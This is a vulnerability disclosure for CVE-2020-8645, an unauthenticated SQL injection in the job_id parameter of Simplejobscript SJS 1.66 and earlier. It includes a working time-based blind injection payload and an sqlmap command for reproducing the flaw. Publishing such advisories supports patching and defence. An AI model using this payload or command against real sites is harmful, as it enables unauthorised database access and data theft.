CVE-2020-8645

An issue was discovered in Simplejobscript.com SJS through 1.66. There is an unauthenticated SQL injection via the job applications search function. The vulnerable parameter is job_id. The function is getJobApplicationsByJobId(). The file is _lib/class.JobApplication.php.


Description:
An issue was discovered in Simplejobscript.com SJS through 1.66. There is an unauthenticated SQL injection via the job applications search function. The vulnerable parameter is job_id. The function is getJobApplicationsByJobId(). The file is _lib/class.JobApplication.php.

Details:
File: /_lib/class.JobApplication.php
Function: getJobApplicationsByJobId()
URL: /get_job_applications_ajax.php
Parameter: job_id

Payload:

POST /get_job_applications_ajax.php
job_id=493+AND+(SELECT+9069+FROM+(SELECT(SLEEP(5)))Ufmy)

Steps to Reproduce:

$ sqlmap --batch --threads=10 --dbms=mysql -u "http://local.simplejobscript.net/get_job_applications_ajax.php" --data="job_id=493" --banner

PoC:
cve-2020-8645 SimpleJobScript sqli